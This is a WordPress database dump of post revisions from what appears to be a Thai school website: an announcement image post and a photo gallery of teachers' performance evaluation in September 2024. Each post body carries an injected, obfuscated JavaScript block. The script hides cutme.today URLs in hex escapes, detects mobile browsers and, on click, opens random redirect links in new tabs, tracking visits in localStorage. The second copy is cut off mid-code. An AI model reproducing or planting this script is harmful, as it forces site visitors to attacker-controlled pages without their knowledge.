(1138,1,'2024-09-12 21:34:44','2024-09-12 14:34:44','<!-- wp:image {\"id\":1137,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/33-2567-724x1024.png\" alt=\"\" class=\"wp-image-1137\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','1136-revision-v1','','','2024-09-12 21:34:44','2024-09-12 14:34:44','',1136,'http://pakhaeng.ssk.in.th/?p=1138',0,'revision','',0),
(1139,1,'2024-09-12 21:37:17','2024-09-12 14:37:17','<!-- wp:paragraph -->\n<p>สำหรับข้าราชการครูและบุคลากรทางการศึกษา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>วันที่ 11 กันยายน พ.ศ.2567 คณะครู โรงเรียนบ้านหนองปลาเข็ง กอไหล่ รับการประเมินผลการพัฒนางานตามข้อตกลง (PA)สำหรับข้าราชการครูและบุคลากรทางการศึกษาประจำปีงบประมาณ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ขอขอบพระคุณคณะกรรมการทุกท่านมา ณ โอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1140,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_17-1024x576.jpg\" alt=\"\" class=\"wp-image-1140\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1145,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_16-1024x576.jpg\" alt=\"\" class=\"wp-image-1145\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1141,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_15-1024x576.jpg\" alt=\"\" class=\"wp-image-1141\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1144,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_14-1024x576.jpg\" alt=\"\" class=\"wp-image-1144\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1142,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_13-1024x576.jpg\" alt=\"\" class=\"wp-image-1142\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1143,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_12-1024x576.jpg\" alt=\"\" class=\"wp-image-1143\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1146,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_11-1024x768.jpg\" alt=\"\" class=\"wp-image-1146\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1147,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_10-1024x576.jpg\" alt=\"\" class=\"wp-image-1147\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1148,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_9-1024x768.jpg\" alt=\"\" class=\"wp-image-1148\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1151,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_8-1024x768.jpg\" alt=\"\" class=\"wp-image-1151\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1149,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_7-1024x768.jpg\" alt=\"\" class=\"wp-image-1149\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1150,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6-1024x768.jpg\" alt=\"\" class=\"wp-image-1150\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1152,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_5-1024x576.jpg\" alt=\"\" class=\"wp-image-1152\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1153,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_4-1024x576.jpg\" alt=\"\" class=\"wp-image-1153\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1154,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_3-1024x576.jpg\" alt=\"\" class=\"wp-image-1154\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1155,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1155\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1156,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1156\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 